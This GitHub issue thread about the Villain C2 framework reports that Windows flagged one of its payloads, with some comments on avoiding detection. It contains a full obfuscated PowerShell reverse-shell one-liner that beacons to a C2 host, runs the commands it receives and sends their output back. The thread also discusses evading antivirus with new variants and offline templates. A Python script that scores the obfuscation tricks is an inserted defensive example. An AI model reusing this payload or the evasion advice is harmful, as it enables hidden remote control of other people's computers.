t3l3machus / Villain

Villain is a high level stage 0/1 C2 framework that can handle multiple reverse TCP & HoaxShell-based shells, enhance their functionality with additional features (commands, utilities) and share them among connected sibling servers (Villain instances running on different machines).

Obfuscated payload detected by Windows 11 #46

Closed timgerstel closed 1 year ago

timgerstel commented 1 year ago

S't'aR'T-pRO'CeSS $PSHOME\powershell.exe -aRgUMentList {$23b3d0='192.168.1.111'+':808'+'0';$5c98='07932e8b-b'+'b2bacb8-1'+'54b'+'7'+'992';$038f0='h'+'tt'+'p:'+'//';$f84bfb=i'rM' -UsEBaSICpArsiNg -uri $038f0$23b3d0/07932e8b/$env:coMpUteRNaME/$env:usErNAMe -hEadeRS @{"Authorization"=$5c98};for (;;){$1=(i'rM' -UsEBaSICpArsiNg -uri $038f0$23b3d0/bb2bacb8 -hEadeRS @{"Authorization"=$5c98});if ($1 -Ne ('Non'+'e')) {$1d=iNV'OkE-EXPrEsS'IoN $1 -erROrAcTiON ST'Op' -erRORVArIABLe 1ce;$1d=OUT-'StR'INg -inPuTOBjeCt $1d;$c186d=i'rM' -uri $038f0$23b3d0/154b7992 -METHoD POST -hEadeRS @{"Authorization"=$5c98} -BOdy ([SYsTeM.tEXt.encOdINg]::UTf8.getbYTes($1ce+$1d) -jOIn ' ')} s'lEep' 0.8}} -WindoWSTyle HI'dd'EN

At line:1 char:1
+ S't'aR'T-pRO'CeSS $PSHOME\powershell.exe -aRgUMentList {$23b3d0='192. ...
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
This script contains malicious content and has been blocked by your antivirus software.
    + CategoryInfo          : ParserError: (:) [], ParentContainsErrorRecordException
    + FullyQualifiedErrorId : ScriptContainedMaliciousContent
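The one-liner that AMSI blocked above leans on three transformations that have no effect on what PowerShell executes: command and parameter names split with quote characters (S't'aR'T-pRO'CeSS), URLs and tokens assembled from tiny string literals ('h'+'tt'+'p:'+'//'), and randomised letter case in cmdlet and parameter names (-aRgUMentList). Because PowerShell is case-insensitive and joins a bare word with an adjacent quoted string into one token, each of these exists only to defeat plain signature matching, which is exactly what makes them useful as detection features. The script below is an added example written for this thread, not code from Villain or from any of the participants: it normalises a script, counts those three indicators and returns a score. The sample input is a constructed, shortened skeleton modelled on the posted payload with placeholder host, token and paths; the CANONICAL table is a hand-picked subset of names and the weights and threshold are arbitrary choices, not values from the project or from any product.

```python
"""Heuristic scoring of PowerShell obfuscation indicators (added example)."""
import re

# Constructed sample modelled on the payload posted in the issue. Host, token
# and paths are placeholders and the beacon loop is left out; it is input for
# the scorer, not something that runs.
SAMPLE_OBFUSCATED = (
    "S't'aR'T-pRO'CeSS $PSHOME\\powershell.exe -aRgUMentList {"
    "$h='EXAMPLE-HOST'+':808'+'0';$s='h'+'tt'+'p:'+'//';"
    "$r=i'rM' -UsEBaSICpArsiNg -uri $s$h/EXAMPLE-PATH -hEadeRS @{\"Authorization\"=$t};"
    "$o=iNV'OkE-EXPrEsS'IoN $r -erROrAcTiON ST'Op';s'lEep' 0.8} -WindoWSTyle HI'dd'EN"
)

# Constructed benign sample using the same cmdlets in their normal spelling.
SAMPLE_BENIGN = (
    "Start-Process -FilePath notepad.exe -WindowStyle Hidden; "
    "Invoke-RestMethod -Uri 'https://example.invalid/health' -UseBasicParsing"
)

# Canonical casing for the names the payload uses (hand-picked subset; extend as needed).
CANONICAL = {
    "start-process": "Start-Process",
    "invoke-expression": "Invoke-Expression",
    "invoke-restmethod": "Invoke-RestMethod",
    "irm": "irm",
    "iex": "iex",
    "out-string": "Out-String",
    "start-sleep": "Start-Sleep",
    "sleep": "sleep",
    "-argumentlist": "-ArgumentList",
    "-usebasicparsing": "-UseBasicParsing",
    "-uri": "-Uri",
    "-headers": "-Headers",
    "-method": "-Method",
    "-body": "-Body",
    "-erroraction": "-ErrorAction",
    "-errorvariable": "-ErrorVariable",
    "-windowstyle": "-WindowStyle",
    "hidden": "Hidden",
    "stop": "Stop",
}

# A quoted run of letters glued to a letter on either side, e.g. S't'aR'T or i'rM'.
QUOTE_SPLIT = re.compile(r"(?<=[A-Za-z])'([A-Za-z-]+)'|'([A-Za-z-]+)'(?=[A-Za-z])")
# A literal of at most four characters immediately concatenated to another literal.
TINY_CONCAT = re.compile(r"'[^']{1,4}'\s*\+\s*(?=['\"])")
# Bare words and parameter names after normalisation.
TOKEN = re.compile(r"-?[A-Za-z][A-Za-z-]*")

# Arbitrary weights and threshold chosen for this example.
WEIGHTS = {"quote_split": 2, "tiny_concat": 1, "case_mismatch": 1}
THRESHOLD = 6


def normalize(script: str) -> str:
    """Rejoin quote-split names so the real command and parameter words reappear."""
    return QUOTE_SPLIT.sub(lambda m: m.group(1) or m.group(2), script)


def case_mismatches(normalized: str) -> list[str]:
    """Known names written in neither canonical, all-lower nor all-upper case."""
    hits = []
    for tok in TOKEN.findall(normalized):
        canon = CANONICAL.get(tok.lower())
        if canon is None or tok in (canon, tok.lower(), tok.upper()):
            continue
        hits.append(tok)
    return hits


def score(script: str) -> dict:
    """Count the three indicators and turn them into a weighted score."""
    normalized = normalize(script)
    indicators = {
        "quote_split": len(QUOTE_SPLIT.findall(script)),
        "tiny_concat": len(TINY_CONCAT.findall(script)),
        "case_mismatch": len(case_mismatches(normalized)),
    }
    total = sum(WEIGHTS[k] * v for k, v in indicators.items())
    return {
        "indicators": indicators,
        "score": total,
        "suspicious": total >= THRESHOLD,
        "normalized": normalized,
    }


if __name__ == "__main__":
    for name, sample in (("benign", SAMPLE_BENIGN), ("obfuscated", SAMPLE_OBFUSCATED)):
        result = score(sample)
        print(f"{name}: {result['indicators']} score={result['score']} "
              f"suspicious={result['suspicious']}")
```

Normalising before the case check matters: without rejoining the quote-split names, StaRT-pROCeSS never appears as a single token and the lookup in CANONICAL would miss it. All-lowercase and all-uppercase spellings are deliberately accepted, since `-uri` or `IRM` are common in hand-written scripts, while mixed spellings that match no convention are not something a person types.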

timgerstel commented 1 year ago

Edit: this is resolved by https://github.com/t3l3machus/Villain/pull/41

t3l3machus commented 1 year ago

@timgerstel that pull request is proposing a change I have demonstrated in the video mentioned at the top of the README, in which I present ideas to bypass detection. Secondly, the change doesn't resolve anything; this variation will start getting caught as well, especially if I merge.

timgerstel commented 1 year ago

@t3l3machus I see, the notion of creating your own templates and keeping them offline makes complete sense. I am not too familiar with PowerShell's scripting language, so I was just looking for a quick copy/pasteable working demo.

This project is quite impressive, looking forward to seeing where you take it in the future.